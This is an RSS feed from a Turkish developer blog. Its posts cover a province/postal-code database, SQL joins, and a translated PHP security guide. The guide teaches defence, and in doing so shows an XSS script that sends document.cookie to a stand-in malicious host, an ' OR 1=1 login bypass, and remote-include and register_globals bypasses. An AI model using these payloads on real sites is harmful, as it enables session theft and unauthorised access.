<?xml version="1.0" encoding="utf-8"?> <rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" ><channel><title>Muzaffer AKYIL (Victorious) &#187; SQL</title> <atom:link href="http://muzaffer.akyil.net/tag/sql/feed" rel="self" type="application/rss+xml" /><link>http://muzaffer.akyil.net</link> <description></description> <lastBuildDate>Tue, 08 Mar 2011 09:18:58 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=</generator> <item><title>İl &#8211; İlçe &#8211; Semt &#8211; Mahalle &#8211; Köy &#8211; Plaka &#8211; Posta Kodu Veritabanı</title><link>http://muzaffer.akyil.net/2010/11/30/makale/yazilim/sql/admin/il_ilce_semt_mahalle_koy_plaka_posta_kutusu_veritabani.aspx</link> <comments>http://muzaffer.akyil.net/2010/11/30/makale/yazilim/sql/admin/il_ilce_semt_mahalle_koy_plaka_posta_kutusu_veritabani.aspx#comments</comments> <pubDate>Tue, 30 Nov 2010 13:40:21 +0000</pubDate> <dc:creator>Muzaffer Ali AKYIL</dc:creator> <category><![CDATA[SQL]]></category> <category><![CDATA[database]]></category> <category><![CDATA[db]]></category> <category><![CDATA[Excel]]></category> <category><![CDATA[il]]></category> <category><![CDATA[ilçe]]></category> <category><![CDATA[köy]]></category> <category><![CDATA[mahalle]]></category> <category><![CDATA[plaka]]></category> <category><![CDATA[posta kodu]]></category> <category><![CDATA[ptt]]></category> <category><![CDATA[veritabanı]]></category><guid isPermaLink="false">http://www.muzafferakyil.com/2008/01/25/makale/yazilim/sql/admin/il-ile-mahalle-veritabani.aspx</guid> <description><![CDATA[Eğer web sitesi yada program yazan biri iseniz yada işiniz gereği il ilçe mahalle bilgisine ihtiyaç duyuyorsanız bu konu sizi çok ilgilendirmektedir. PTT den 30.11.2010 tarihi itibariyle aldığım il &#8211; plaka &#8211; ilçe &#8211; semt &#8211; mahalle &#8211; köy &#8211; posta kodu veritabanını normal kullanıcıların ve biz programcıların kullanabileceği formatta sizlere sunuyorum. GÜNCELLEME 19.08.2009 tarihi [...]]]></description> <content:encoded><![CDATA[<p>Eğer web sitesi yada program yazan biri iseniz yada işiniz gereği il ilçe mahalle bilgisine ihtiyaç duyuyorsanız bu konu sizi çok ilgilendirmektedir.<br /> <br /> PTT den 30.11.2010 tarihi itibariyle aldığım <strong><span style="color: #ff0000;">il &#8211; plaka &#8211; ilçe &#8211; semt &#8211; mahalle &#8211; köy &#8211; posta kodu</span></strong> veritabanını normal kullanıcıların ve biz programcıların kullanabileceği formatta sizlere sunuyorum.<br /> <span id="more-103"></span></p><blockquote><p><strong><span style="color: #ff0000;">GÜNCELLEME</span></strong></p><p><del datetime="30.11.2010" cite="güncelleme">19.08.2009 tarihi itibariyle PTT den alınan veritabanı ile köylerde dahil olmak üzere güncellenmiştir.</del><br /> <ins datetime="30.11.2010" cite="güncelleme">30.11.2010 tarihi itibariyle PTT den alınan veritabanı ile güncellenip 3 farklı coding ile yayınlanmıştır.</ins></p></blockquote><h5>Nerede ?</h5><p><a href="http://muzaffer.akyil.net/wp-content/uploads/il_ilce_semt_mahalle_koy_excel2003.rar" class="lizip">İl İlçe Semt Mahalle Köy Plaka Posta Kodu &#8211; Excel 2003</a></p><p><a href="http://muzaffer.akyil.net/wp-content/uploads/il_ilce_semt_mah_pk_latin1_ansi.rar" class="lizip">İl İlçe Semt Mahalle Köy Plaka Posta Kodu &#8211; MySQL &#8211; Latin1 &#8211; ANSI</a></p><p><a href="http://muzaffer.akyil.net/wp-content/uploads/il_ilce_semt_mah_pk_latin5_ansi.rar" class="lizip">İl İlçe Semt Mahalle Köy Plaka Posta Kodu &#8211; MySQL &#8211; Latin5 &#8211; ANSI</a></p><p><a href="http://muzaffer.akyil.net/wp-content/uploads/il_ilce_semt_mah_pk_utf8.rar" class="lizip">İl İlçe Semt Mahalle Köy Plaka Posta Kodu &#8211; MySQL &#8211; UTF8</a></p><h5>Nasıl ?</h5><p>MySQL veritabanı şekliyle verilerin birbirine bağlantısı aşağıdaki gibidir ;</p><div id="attachment_394" class="wp-caption aligncenter" style="width: 310px"><a href="http://muzaffer.akyil.net/wp-content/uploads/iismkpp.png" class="liimagelink"><img class="size-medium wp-image-394   colorbox-103" title="İl İlçe Semt Mahalle Köy Plaka Posta Kodu Veritabanı" src="http://muzaffer.akyil.net/wp-content/uploads/iismkpp-300x71.png" alt="İl İlçe Semt Mahalle Köy Plaka Posta Kodu Veritabanı" width="300" height="71" /></a><p class="wp-caption-text">İl İlçe Semt Mahalle Köy Plaka Posta Kodu</p></div><p>MySQL Sorgu olarak şu şekilde kullanılabilir ;</p><pre class="brush: sql; ">

SELECT il.IL_ID,
       il.IL_ADI_BUYUK,
       il.IL_ADI,
       il.IL_ADI_KUCUK,
       il.PLAKA,
       ilce.ILCE_ID,
       ilce.ILCE_ADI_BUYUK,
       ilce.ILCE_ADI,
       ilce.ILCE_ADI_KUCUK,
       semt.SEMT_ID,
       semt.SEMT_ADI_BUYUK,
       semt.SEMT_ADI,
       semt.SEMT_ADI_KUCUK,
       semt.POSTA_KODU,
       mahalle_koy.MAH_ID,
       mahalle_koy.MAHALLE_ADI_BUYUK,
       mahalle_koy.MAHALLE_ADI,
       mahalle_koy.MAHALLE_ADI_KUCUK
FROM   il
       LEFT JOIN ilce
            ON  ilce.IL_ID = il.IL_ID
       LEFT JOIN semt
            ON  semt.ILCE_ID = ilce.ILCE_ID
       LEFT JOIN mahalle_koy
            ON  mahalle_koy.SEMT_ID = semt.SEMT_ID
</pre><p>Kolay Gelsin&#8230;</p> <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fmuzaffer.akyil.net%2F2010%2F11%2F30%2Fmakale%2Fyazilim%2Fsql%2Fadmin%2Fil_ilce_semt_mahalle_koy_plaka_posta_kutusu_veritabani.aspx&amp;layout=standard&amp;show_faces=true&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe><img class="colorbox-103"  src="http://muzaffer.akyil.net/?ak_action=api_record_view&id=103&type=feed" alt="" />]]></content:encoded> <wfw:commentRss>http://muzaffer.akyil.net/2010/11/30/makale/yazilim/sql/admin/il_ilce_semt_mahalle_koy_plaka_posta_kutusu_veritabani.aspx/feed</wfw:commentRss> <slash:comments>19</slash:comments> </item> <item><title>PHP Güvenlik Kılavuzu</title><link>http://muzaffer.akyil.net/2009/02/20/makale/yazilim/php/admin/php-guvenlik-kilavuzu.aspx</link> <comments>http://muzaffer.akyil.net/2009/02/20/makale/yazilim/php/admin/php-guvenlik-kilavuzu.aspx#comments</comments> <pubDate>Fri, 20 Feb 2009 11:47:27 +0000</pubDate> <dc:creator>Muzaffer Ali AKYIL</dc:creator> <category><![CDATA[Güvenlik]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[arı]]></category> <category><![CDATA[ddos]]></category> <category><![CDATA[injection]]></category> <category><![CDATA[okan]]></category> <category><![CDATA[SQL]]></category><guid isPermaLink="false">http://muzaffer.akyil.net/?p=145</guid> <description><![CDATA[Çok değerli arkadaşım Okan Arı&#8216;nın PHP ve Güvenlik üzerinde derlediği Türkçeye çevirdiği bir metni sizinle paylaşmak istedim. Buyrun bakalım ; Giriş PHP, bir çok yazılım dilinden farklı olarak, buffer-overflows gibi hafıza problemleri olan, bundan dolayı güvenlik problemine neden olabilecek bir dil değildir. Aynı zamanda PHP öğrenilmesi kolay ve hızlı bir dildir. Bu kolay ve hızlı [...]]]></description> <content:encoded><![CDATA[<p>Çok değerli arkadaşım <a href="http://www.okanari.com" target="_blank" class="liexternal previewlink">Okan Arı</a>&#8216;nın PHP ve Güvenlik üzerinde derlediği Türkçeye çevirdiği bir metni sizinle paylaşmak istedim.<br /> <span id="more-145"></span><br /> Buyrun bakalım ;</p><p><strong>Giriş</strong></p><p>PHP, bir çok yazılım dilinden farklı olarak, buffer-overflows gibi hafıza problemleri olan, bundan dolayı güvenlik problemine neden olabilecek bir dil değildir. Aynı zamanda PHP öğrenilmesi kolay ve hızlı bir dildir. Bu kolay ve hızlı öğrenilebilirlik, bu dili bir çok kişinin öğrenmesine, aynı hızda üretim yaparak uygulama geliştirmesine de olanak sağlamaktadır. Ancak bu durum, bilinsizce yapılan kodlama teknikleri nedeniyle kendi içerisince ciddi bir güvenlik problemini yanında getirmektedir.<br /> Bu klavuz size, online güvenlik, web tabanlı yazılım geliştirirken PHP’de temel güvenliği nasıl sağlayacağınız konusunda fikir vermek için hazırlanmıştır. Klavuz içerisinde başlangıç seviyesi kullanıcılar için önemli bilgiler, uzmanlar için belki de gözden kaçan ufak ipuçları bulunabilir.<br /> <strong><br /> Atak Tipleri:</p><p>XSS Atağı:</strong><br /> XSS &#8220;Cross Site Scriptting&#8221; anlamında kullanılmaktadır ve bir sayfaya içerik girmek -JavaScript gibi- gibi düşünebiliriz. XSS atakları genelde kullanıcının Cookie (çerez) lerini çalmak amacıyla kullanılır. Bu cookie’ler kullanıcı login bilgileri, sişreleri ya da benzeri önemli bilgileri içeriyor olabilir.</p><p>Basit anlamda bir örnek verelim.</p><pre class="brush: php; ">

$id=$_GET[&#039;id&#039;];
echo &quot;Gelen ID degeri:&quot;.$id;
</pre><p>Yukarıdaki kodda, $_GET[’id’] degiskeni bir sayı ise problem yok. Ancak ya aşağıdaki gibi bir kodsa?</p><pre class="brush: js; ">

&lt;script&gt;
window.location.href = &quot;http://kotuamaclisite.com/cookie-calanscript.php?c=&#039; + document.cookie;
&lt;/script&gt;
</pre><p>Kullanıcı bir sekilde, bu kotu amaçlı kodu çalıştırırsa, tüm cookie bilgilerini kotü amaçlı siteye devredebilir.</p><p><strong>XSS Ataklarından Nasıl Korunurum?</strong></p><p>İlk olarak, asla kullanıcı girişi bilgilerine güvenmeyiniz. Kullanıcılardan girilen her bilgiyi mutlaka kontrol edip filtrelememiz gerekiyor. Yani gelen kullanıcı bilgilerini HTML tag’lerinden arındırırsak bir JavaScript kodu çalıştırılamak hale getirebiliriz. Bunu yapmanın en kolay yolu PHP’nin strip_tags() fonksiyonunu kullanmaktır. Bu fonksiyon tüm HTML tag’lerini temizleyecektir. HTML tag’lerini silmemek ama onları zararsız hale getirmk için htmlentities() fonksiyonunu da kullananilirsiniz. Bu fonksiyon, < ve > karakterlerini < ve >karakterlerine dönüştürecektir.</p><p><strong>SQL Injection Yönetemi:</strong></p><p>Günümüzde bir çok web sitesi verileri barındırmak için veritabanı kullanmaktadır. Bu bağlamda veritabanına girmek için bir çok INSERT, UPDATE ve SELECT işlemleri yapılmaktadır. Buna rağmen bir çok site, form verileri açısında SQL Injection yöntemi ile atağa uğramak konusunda yeterli güvenliğe sahip değildir.</p><p>SQL Injection, değiştirilmiş, atak için düzenlenmiş form içerikleri ile yapılan veritabanı sorgularıdır. Bu ataklar veritabanınızdan bir kaç veriyi çalmak, izinsiz login olmak, ya da tüm veritabanını silmek gibi sonuçları doğurabilir.</p><p>En genel kullanımı anlatmak için aşağıdaki kod örneğine bakalım:</p><pre class="brush: php; ">

site_users
WHERE
username = &#039;$username&#039;
AND
password = &#039;$password&#039;
&quot;);

if ( mysql_num_rows($result) &gt; 0 )
// login oldu
</pre><p>Yukarıdaki kod örneği, SQL Injection için gerekli ortamı hazırlamaktadır, bu konuda zaafiyet oluştrabilecek bir kod örneğidir. Kötü amaçlı bir kişi yukarıdaki SQL&#8217;i değiştirerek sisteme izinsiz giriş yapabilir. (Kullanıcı şifresini girmeden login olabilir)</p><p>Örneğin kötü kullanıcı (saldırgan) kullanıcı adı alanına &#8220;rob&#8221; şifre (password) alanına aşağıdaki gibi bir giriş yaparsa:</p><p>&#8216; OR 1=1 &#8216;</p><p>Yukarıdaki kod şu şekli alır:</p><pre class="brush: sql; ">

SELECT *
FROM
site_users
WHERE
username = &#039;rob&#039;
AND
password = &quot; OR 1=1
</pre><p>Bu SQL sorgusu ise, kullanıcı adı &#8220;rob&#8221; olan kaydın şifresi ne olursa olsun getirmektedir. Yani şifre kontrolu gerçekleşememiştir.</p><p><strong>SQL Injection Atağından Nasıl Korunurum?</strong></p><p>XSS Atağında olduğu gibi, en büyük sorun kullanıcının gönderdiği veriyi olduğu gibi kullanmaktır. Korunmanın en iyi yöntemi ise, kullancıı verisini riskli karakterlerden arındırmaktır. mysql_real_escape_string() fonksiyonu bu amaçla PHP içerisinde yer alıyor. Bu fonksiyon riskli olan &#8216; ve &#8221; gibi karakterleri temizlemektedir. Ayrıca, SQL sorgularınızda kullandığınız kullancıı verileri, eğer, sayı olmanı bekleniyorsa intval() fonksiyonu ile gelen verinin sadece sayı bilgisi olan kısmı alınmalıdır.</p><p><strong>Dosya Yüklemesi Atağı (File Upload)</strong></p><p>Kullancıların yükledikleri dosyalar en büyük güvenlik risk unsurlarının başında gelmektedir. Bu, tanımadığınzı bilmediğiniz dosyaları sunucunuzda barındırmak anlamındadır. Bu dosyalar, dosyalarınız silmek için, veri tabanınızı boşaltmak için olabilir. Ya da daha başka bir çok güvenlik problemine neden açabilecek dosyalar olabilir.</p><p>Buna rağmen, güvenli şekilde dosya almak kontrol içerisinde alındığında mümkündür.</p><p>Kullanıcıların sisteminize dosya yüklemesine izin verdiğiniz durumlarda, kontrol etmeniz gereken 2 önemli bilgi mevcuttur.</p><p>Birincisi, dosyanın &#8220;mime-type&#8221; ıdır. Yani, dosyanın header’ında bulunan ve dosya tipini belirten bölüm. Örneğin kullanıcının sadece resim dosyası upload etmesini istiyorsanız yüklenen dosyanın &#8220;mime-type&#8221; ı image/png, image/jpeg, image/gif, image/x-png ya da image/p-jpeg olmalıdır. Aşağıdaki kod bu kontrolü gerçekleştirir.</p><pre class="brush: php; ">

$validMimes = array(
&#039;image/png&#039;,
&#039;image/x-png&#039;,
&#039;image/gif&#039;,
&#039;image/jpeg&#039;,
&#039;image/pjpeg&#039;
);

$image = $_FILES[&#039;image&#039;];

if(!in_array($image[&#039;type&#039;], $validMimes)) {
die(&#039;Üzgünüm, izin verilmeyen dosya tipi.&#039;);
}

// İşlem tamam yüklemeyi gerçekletir vs vs.
</pre><p>İkinci kontrol etmeniz gereken bilgi ise, dosyanın uzantısıdır. Zira, mime-type bilgisi manuple edilebilir bir bilgidir. Bu bağlamda dosyanın uzantısını kontrol etmeniz gerekir. Zira bir kullanıcı, bir imaj dosyasının mime-type ı ile bir PHP dosyası gönderebilir. Bu durumda siz bir PHP dosyasını sisteminize almış olursunuz ki bu çok ciddi bir risk faktörüdür.</p><p>Bu durumdan korunmak için, sisteminize yüklediğiniz dosyaların uzantıları, siz tanımlamalısınız. Bu tanımlamayı ise mime-type bilgise göre yapabilirsiniz. Aşağıdaki örneğe bakalım:</p><pre class="brush: php; ">

$validMimes = array(
&#039;image/png&#039; =&gt; &#039;.png&#039;,
&#039;image/x-png&#039; =&gt; &#039;.png&#039;,
&#039;image/gif&#039; =&gt; &#039;.gif&#039;,
&#039;image/jpeg&#039; =&gt; &#039;.jpg&#039;,
&#039;image/pjpeg&#039; =&gt; &#039;.jpg&#039;
);

$image = $_FILES[&#039;image&#039;];

if(!array_key_exists($image[&#039;type&#039;], $validMimes)) {
die(&#039;Üzgünüm, izin verilmeyen dosya tipi.&#039;);
}

// Dosya uzantısını barındırmayan dosya adını alalım:
$filename = substr($image[&#039;name&#039;], 0, strrpos($image[&#039;name&#039;], &#039;.&#039;));

// Mime type göre dogru uzantıyı verelim
$filename .= $validMimes[$image[&#039;type&#039;]];

// İşlem tamam
</pre><p>Yukarıdaki örnekle, bir PHP dosyanının sanki bir resim dosyasıymış gibi sisteminize PHP dosyası olarak yüklenmesini engellediniz. Dosya mime-type’ı PNG’yi işaret ediyorsa, dosya uzantısı .png olacaktır.</p><p><strong>Dosya Include Atağı:</strong></p><p>Kullanımı çok yaygın olan index.php?sayfa=xxxx.php şeklideki dosya include yöntemi çok ciddi risk taşıyabilir. Bu kullanım genelde, menü yapısı, logo gibi bölümleri index.php ye kaydedip içerik bölümünü başka dosyalarda saklayarak site yönetimini kolaylaştırmak için kullanılır. Bu durumdaki yanlışlık,</p><pre class="brush: php; ">

include $_GET[&#039;sayfa&#039;];
</pre><p>gibi bir kod ile gelen değişkene göre sayfayı include etmektendir.</p><p>Yukaridaki kullanımda PHP’nin allow_url_fopen ayarı ON durumda ise, yani aktifse, saldırgan başka bir sunucudaki dosyayı sitenize include edebiliyor demektir. Kodunuz da echo file_get_contents() değil de include kullanıdığı için bu çok sık karşılaşılan bir açığa sebebiyet vermektedir. Bu durum, sunucunuzun tüm kontrolünü saldırgana bırakmak demektir.</p><p>Bu durumdan yapabileceğiniz 2 şey vardır.</p><p>Birincisi, bir liste oluşturup gelen değişkeni burada kontrol etmektir. Örneğin şöyle bir kod ile:</p><pre class="brush: php; ">

switch($_GET[&#039;sayfa&#039;]) {
case &quot;hakkimizda&quot;:
include(&#039;hakkimizda.php&#039;);
break;
case &quot;haberler&quot;:
include(&#039;haberler.php&#039;);
break;
default:
include(&#039;anasayfa.php&#039;);
}
</pre><p>Bu kod ile include edebileceğiniz her sayfayı belirtiyor ve belirtmediğiniz sayfa için anasayfa.php dosyasını include ediyorsunuz. Bu yöntemin zor tarafı, ekleyeceğiniz her sayfayı bu listeye de eklemek zorunluluğudur.</p><p>İkinci bir yöntem ise, dışarodan gelen $_GET['sayfa'] değişkenini kontrol etmek ve temizlemektir.</p><pre class="brush: php; ">

$sayfa = preg_replace(&#039;/\W/si&#039;, &#039;&#039;, $_GET[&#039;sayfa&#039;]);

include(&#039;./&#039;.$sayfa.&#039;.php&#039;);
</pre><p>Yukarıdaki kod, &#8220;..&#8221;, &#8220;/&#8221; gibi karakterleri temizleyerek kullanıcının 212.111.111.111 gibi ip ya da http://www.kotusite.com gibi domain belirtmesini engeller. Bu verileri 212111111111, httpwwwkotusitecom şekline çevirir.</p><p>Dosya include atağındaki diğer bir açık ise, include edilen dosyaların uzantılarını .inc gibi sunucunun tanımayacağı bir uzantı yapmaktır. Örneğin, config.inc gibi bir dosya yapıp bunu include etmek çok sakıncalı olabilir. Zira, saldırgan bu dosyanın adını ve yerini öğrendiğinde, eğer web suncuunuz bu dosyayı çalıştırabilir bir dosya olarak tanımıyorsa (ki tanımama ihtimali yüksektir), saldırdan dosya içeriğini görecektir. Bu durumda yapabileceğiniz, her türlü dosya uzantınızı .php yapmaktır. Boylece saldırgan bu dosyaların içeriğini görüntüleyemez. Diğer bir yöntem ise Apache sunucular için, aşağıdaki gibi bir .htaccess dosyası olusturarak .inc dosyalarının ulaşılmasını engelleyebilirsiniz.</p><pre class="brush: c; ">

&lt;files ~ &quot;\.inc$&quot;&gt;
Order allow,deny
Deny from all
&lt;/files&gt;
</pre><p><strong>Register Globals Atağı:</strong></p><p>register_globals değeri PHP ayarında ON durumda ise, $_POST, $_GET, $_SERVER, $_COOKIE, $_REQUEST, $_FILE ile gelen değişkenlere global değişkenler olarak ulaşabilirsiniz. Yani mesela $_POST[’mesaj’] değişkenine $mesaj olarak ulaşabilirsiniz.</p><p>register_globals değeri güncel PHP kurulumlarında varsayılan olarak OFF durumdadır. Ancak eski bir PHP kurulumu bulunan sunucuda, ya da sistem yönetici tarafından özellikle açılmış bir sunucuda ON durumunda olabilir (ki paylaşımlı hosting firmaları geçmiş müşterilerinin kodlarının uyumu adına açabiliyorlar).</p><p>register_globals’in ON olamsı durumu için aşağıdaki kodu inceleyelim.</p><p>dosya.php dosyası örneği:</p><pre class="brush: php; ">

if($_POST[&#039;username&#039;] == &#039;rob&#039; &amp;&amp; $_POST[&#039;password&#039;] == &#039;foo&#039;) {
$authenticated = true;
}

if($authenticated) {
// giriş başarılı bişeyler yapalım
}
</pre><p>Saldırgan, dosya.php?authenticated=true şeklinde bir URL çağrımı ile, sisteme izinsiz giriş yapabilir.</p><p>Bu durumda ne yapacağız, register_globals değerini OFF yapamayabileceğimiz durumların her zaman gerçekleşebileceğini düşünerek, kodumuzu şu şekilde değiştirelim.</p><pre class="brush: php; ">

$authenticated = false;

if($_POST[&#039;username&#039;] == &#039;rob&#039; &amp;&amp; $_POST[&#039;password&#039;] == &#039;foo&#039;) {
$authenticated = true;
}

if($authenticated) {
// giriş başarılı bişeyler yapalım
}
</pre><p>Bu kod, $authenticated değişkenini sayfa başında false yapmaktadır. $_POST&#8217;tan gelen veri eğer uygunsa $authenticated true yapılır. Böylece, dışarıdan gönderilen değişken ile izinsiz giriş yaplıması engellenmiş olur.</p><p>Derleme ve Çeviri : <a href="http://www.okanari.com" target="_blank" class="liexternal previewlink">Okan ARI</a></p> <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fmuzaffer.akyil.net%2F2009%2F02%2F20%2Fmakale%2Fyazilim%2Fphp%2Fadmin%2Fphp-guvenlik-kilavuzu.aspx&amp;layout=standard&amp;show_faces=true&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe><img class="colorbox-145"  src="http://muzaffer.akyil.net/?ak_action=api_record_view&id=145&type=feed" alt="" />]]></content:encoded> <wfw:commentRss>http://muzaffer.akyil.net/2009/02/20/makale/yazilim/php/admin/php-guvenlik-kilavuzu.aspx/feed</wfw:commentRss> <slash:comments>6</slash:comments> </item> <item><title>Inner, Outer, Left, Right, Cross(Full) Join Nedir ?</title><link>http://muzaffer.akyil.net/2008/02/23/makale/yazilim/sql/admin/inner-outer-left-right-crossfull-join-nedir.aspx</link> <comments>http://muzaffer.akyil.net/2008/02/23/makale/yazilim/sql/admin/inner-outer-left-right-crossfull-join-nedir.aspx#comments</comments> <pubDate>Sat, 23 Feb 2008 00:15:02 +0000</pubDate> <dc:creator>Muzaffer Ali AKYIL</dc:creator> <category><![CDATA[SQL]]></category> <category><![CDATA[cross join]]></category> <category><![CDATA[inner join]]></category> <category><![CDATA[join]]></category> <category><![CDATA[left join]]></category> <category><![CDATA[mssql]]></category> <category><![CDATA[mysql]]></category> <category><![CDATA[outer join]]></category> <category><![CDATA[right join]]></category><guid isPermaLink="false">http://www.muzafferakyil.com/2008/02/23/makale/yazilim/sql/admin/inner-outer-left-right-crossfull-join-nedir.aspx</guid> <description><![CDATA[SQL Sorgulama dilinde birden fazla tabloyu birleştirme yada ilgili başka tablodan veri çekmek için Inner, Outer, Left, Right, Cross Join Segmentleri kullanılır. Bunlar aşağıda belirtildiği şekilde kullanılır. Inner Join Çok basit olarak inner join&#160; bir-e-bir join anlamına gelmektedir. İki tablonuz olduğunu düşünün TabloA da Alan1 adlı bir alanınız var bu alanda A,B,C değerleri var,TabloB de [...]]]></description> <content:encoded><![CDATA[<p>SQL Sorgulama dilinde birden fazla tabloyu birleştirme yada ilgili başka tablodan veri çekmek için Inner, Outer, Left, Right, Cross Join Segmentleri kullanılır.</p></p><p><span id="more-115"></span></p><p>Bunlar aşağıda belirtildiği şekilde kullanılır.</p><h4>Inner Join</h4><p><b></b></p><p>Çok basit olarak inner join&nbsp; bir-e-bir join anlamına gelmektedir. İki tablonuz olduğunu düşünün TabloA da Alan1 adlı bir alanınız var bu alanda A,B,C değerleri var,<br />TabloB de Alan1 de ise A,B,K değerleri var.</p><p>Eğer iki tablo arasında inner join kurarsanız sonuç ta dönecek listede sadece A ve B değerleri olacaktır. Çünkü inner joinde yanlızca eşit olan kayıtlar döner.</p><pre class="brush: sql; ">

SELECT TabloA.Alan1 as TabloAAlan1 , TabloB.Alan1 as TabloBAlan1
FROM TabloA INNER JOIN TabloB
ON TabloA.Alan1 = TabloB.Alan1
/*
Kodun MSSQL de sade şekli şudur :
*/
SELECT TabloA.Alan1, TabloB.Alan1 as TabloBAlan1
FROM TabloA , TabloB
WHERE TabloA.Alan1 = TabloB.Alan1
/*
Dönen Sonuç :
TabloAAlan1 TabloBAlan1
A A
B B
*/
</pre><h4>Outer Join<br /></h4><p>Çok basit olarak outer bir-e-çoklu join anlamına gelmektedir (MsSQL Server da çok-a-çoklu join de kurulabilmektedir). İki tablonuz olduğunu düşünün TabloA da Alan1 adlı bir alanınız var bu alanda A,B,C değerleri var, TabloB de Alan1 de ise A,B,K değerleri var.</p><p>Eğer iki tablo arasında outer join kuracaksınız ve sizin için TabloA daki tüm kayıtlar TabloB de ise sadece TabloA da bulunanlar gelir.</p><p><strong>Left Outer Join<br /></strong></p><p>Join kelimesinin sol tarafındaki tabloyu baz alarak eklemek için kullanılır.</p><pre class="brush: sql; ">

SELECT TabloA.Alan1 as TabloAAlan1, TabloB.Alan1 as TabloBAlan1
FROM TabloA LEFT OUTER JOIN TabloB
ON TabloA.Alan1 = TabloB.Alan1
/*
Bu kodun MSSQL de sade şekli şudur :
*/
SELECT TabloA.Alan1 as TabloAAlan1, TabloB.Alan1 as TabloBAlan1
FROM TabloA , TabloB
WHERE TabloA.Alan1 *= TabloB.Alan1
/*
Dönen Sonuç :
TabloAAlan1 TabloBAlan1
A A
B B
C Null
*/
</pre><p><strong><br />Right Outer Join</strong><br />Join kelimesinin sağ tarafındaki tabloyu baz alarak eklemek için kullanılır.</p><pre class="brush: sql; ">

SELECT TabloA.Alan1 as TabloAAlan1, TabloB.Alan1 as TabloBAlan1
FROM TabloA RIGHT OUTER JOIN TabloB
ON TabloA.Alan1 = TabloB.Alan1
/*
Bu kodun MSSQL de sade şekli şudur :
*/
SELECT TabloA.Alan1 as TabloAAlan1, TabloB.Alan1 as TabloBAlan1
FROM TabloA , TabloB
WHERE TabloA.Alan1 =* TabloB.Alan1
/*
Dönen Sonuç :
TabloAAlan1 TabloBAlan1
A A
B B
Null K
*/
</pre><p><strong>Full Outer Join (MySQL için Cross Outer Join)<br /></strong>Her iki tablodaki tüm verileri getirmek için kullanılır.</p><pre class="brush: sql; ">

SELECT TabloA.Alan1 as TabloAAlan1, TabloB.Alan1 as TabloBAlan1
FROM TabloA FULL OUTER JOIN TabloB
ON TabloA.Alan1 = TabloB.Alan1
/*
Bu kodun MSSQL de sade şekli şudur :
*/
SELECT TabloA.Alan1 as TabloAAlan1, TabloB.Alan1 as TabloBAlan1
FROM TabloA , TabloB
WHERE TabloA.Alan1 =* TabloB.Alan1
/*
Dönen Sonuç :
TabloAAlan1 TabloBAlan1
A A
B B
Null K
C Null
*/
</pre><p>Join&#8217; nin sade halinde kullanılan &#8220;*&#8221; karakteri ise sadece Ms SQL Server&#8217;a özeldir. Oracle da ise bu karakter yerine &#8220;(+)&#8221; işareti kullanılmaktadır ve alan isimlerin sonuna bir boşluk bırakarak yazılır.</p><p>Örnek olarak : WHERE TabloA.Alan1 = TabloB.Alan1 (+)</p><blockquote><p>OUTER cümlesi kullanılmasada olur. (Left Join gibi)</p></blockquote><p>Kolay Gelsin.</p> <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fmuzaffer.akyil.net%2F2008%2F02%2F23%2Fmakale%2Fyazilim%2Fsql%2Fadmin%2Finner-outer-left-right-crossfull-join-nedir.aspx&amp;layout=standard&amp;show_faces=true&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe><img class="colorbox-115"  src="http://muzaffer.akyil.net/?ak_action=api_record_view&id=115&type=feed" alt="" />]]></content:encoded> <wfw:commentRss>http://muzaffer.akyil.net/2008/02/23/makale/yazilim/sql/admin/inner-outer-left-right-crossfull-join-nedir.aspx/feed</wfw:commentRss> <slash:comments>11</slash:comments> </item> <item><title>Kısayoldan SQL Tablo Tasarımı</title><link>http://muzaffer.akyil.net/2007/04/12/makale/yazilim/php/admin/kisa-yoldan-sql-tablo-tasarimi.aspx</link> <comments>http://muzaffer.akyil.net/2007/04/12/makale/yazilim/php/admin/kisa-yoldan-sql-tablo-tasarimi.aspx#comments</comments> <pubDate>Thu, 12 Apr 2007 19:17:37 +0000</pubDate> <dc:creator>Muzaffer Ali AKYIL</dc:creator> <category><![CDATA[Internet]]></category> <category><![CDATA[Linux]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[SQL]]></category> <category><![CDATA[Visual Basic]]></category> <category><![CDATA[css]]></category> <category><![CDATA[design]]></category> <category><![CDATA[dhtml]]></category> <category><![CDATA[diagrams]]></category> <category><![CDATA[mssql]]></category> <category><![CDATA[mysql]]></category> <category><![CDATA[oracle]]></category> <category><![CDATA[postgresql]]></category> <category><![CDATA[propel]]></category> <category><![CDATA[schema]]></category> <category><![CDATA[tasarım]]></category> <category><![CDATA[xml]]></category><guid isPermaLink="false">http://www.muzafferakyil.com/2007/04/12/makale/php/admin/kisa-yoldan-sql-tablo-tasarimi.aspx</guid> <description><![CDATA[Hiç başınıza geldimi bilmiyorum ama elinizde tablo tasarımı yapacak bir program bulunmadığı anda SQL komutları ile cebelleşerek tablo oluşturdunuz mu ? Evet şimdi web üzerinde istediğiniz tabloyu oluşturup rahatlıkla FK yapıp bu oluşturduğunuz tabloları XML, MSSQL, MySQL, PostgreSQL, PROPEL, Oracle gibi veritabanı sistem diline çevirebilir, geçici olarak kaydedebilir, tasarımınızın çıktısını alabilirsiniz. Buyrun efendim ; Link]]></description> <content:encoded><![CDATA[<p>Hiç başınıza geldimi bilmiyorum ama elinizde tablo tasarımı yapacak bir program bulunmadığı anda SQL komutları ile cebelleşerek tablo oluşturdunuz mu ? Evet şimdi web üzerinde istediğiniz tabloyu oluşturup rahatlıkla FK yapıp 